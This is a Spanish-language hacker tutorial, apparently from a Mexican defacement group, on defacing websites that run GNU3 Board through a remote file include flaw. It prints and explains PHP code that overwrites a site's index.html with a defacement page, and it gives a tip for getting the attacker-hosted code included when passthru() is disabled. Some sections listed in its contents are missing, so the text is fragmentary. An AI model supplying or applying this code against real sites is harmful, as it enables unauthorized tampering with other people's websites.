Documentos de Académico
Documentos de Profesional
Documentos de Cultura
*/ Http://Www.DefacersMexico.Org */
############################################################################
sh-2.05b$ ./ Escrito por Status-x [ phr4xz@gmail.com ] - Mexico
############################################################################
****************************************************************************
[ Contenido ]
[ 1 ] .- Introduccion.............................................. Status-x
[ 2 ] .- Que es GNU3 Board......................................... Status-x
[ 3 ] .- Buscando Victimas......................................... Status-x
[ 4 ] .- Elaborando codigo......................................... Status-x
[ 5 ] .- Analisis del BUG.......................................... Status-x
[ 6 ] .- Despedida................................................. Status-x
****************************************************************************
############################################################################
sh-2.05b$ ./ Introduccion
############################################################################
Que hay, la web cada vez es mas conocida, lamentablemente estuvo un tiempo
offline con lo que las visitas que ya habiamos ganado fueron perdiendose
sin embargo pronto se recuperaran cuando la web abra, esta vez les traigo
un tutorial para poder hacer un deface a paginas web que usen el sistema
gnu3 Board el cual es vulnerable a file include, sin embargo este es un caso
especial ya que tendremos que hacer cierto codigo para que este nos funcione
antes de comenzar quisiera mandar un saludo a taer de hakim.ws que se va
para tabasco ;)
############################################################################
sh-2.05b$ ./ Que es gnu3 Board
############################################################################
==================================================================
Ahora ese codigo les explicare lo que hace:
==============================
$fp=fopen("./index.html","w+")
==============================
Indica una variable que es $fp la cual va a abrir el archivo index.html de
ese directorio
==============================
fwrite($fp,"<html>
==============================
Enseguida esta funcion nos dice que escriba sobre la variable $fp la cual se
refiere al index.html
===================================================================
<title>Defaced</title>
<body bgcolor=#000000 text=#FFFFFF>
<p align=center><b>Defaced by Status-x</b></p>
<p align=center><b>Stop the war against Iraq and Palestine.</b></p>
<p align=center><b>-= Mexican Hacker =-</b></p>
<p align=center><b>Phr4xz@gmail.com</b></p>
</body>
</html> \n");
fclose($fp);
?>
===================================================================
El codigo de nuestro deface y el cierre del codigo php
Como vemos lo unico que hace este codigo es escribir sobre un archivo en este
caso el index.html, el cual tambien puede ser cambiado por index.php
Un ejemplo de como se verian estos codigos esta en:
http://mx.geocities.com/razorkron/indexphp1p.htm
http://mx.geocities.com/razorkron/indexphp2p.htm <----este codigo escribe sobre
el index principal
http://mx.geocities.com/razorkron/indexphp.htm
Bien ahora que ya tenemos nuestro codigo elaborado procedemos a hacer el
deface a la web que hayamos elegido.
Un dato importante es que el archivo hay que guardarlo como .html ;)
############################################################################
sh-2.05b$ ./ Analisis del Bug
############################################################################
TIP DE DEFACE:
Esta vez un pequeo tip para aquellos novatos o para avanzados francamente pendejo
s
el codigo visto arriba nos sirve para webs que permitan file include normal y qu
e
tengan permisos de escritura, PERO que algunas veces nos dan mensajes como:
=========================================================
Warning passthru() has been disabled for security reasons
=========================================================
entonces simplemente agregamos nuestra URL con el codigo y listo el deface sera
realizado en donde especifiquemos :)
############################################################################
sh-2.05b$ ./ Despedida
############################################################################
Pues un tutorial mas el cual espero que les haya gustado y sobre todo que les
sirva para ir mejorando en el deface, hay ciertos chavos que van y se las dan
de muy chingones sin embargo, no tienen idea de todo lo que implica ser un
defacer o hacer un deface ;)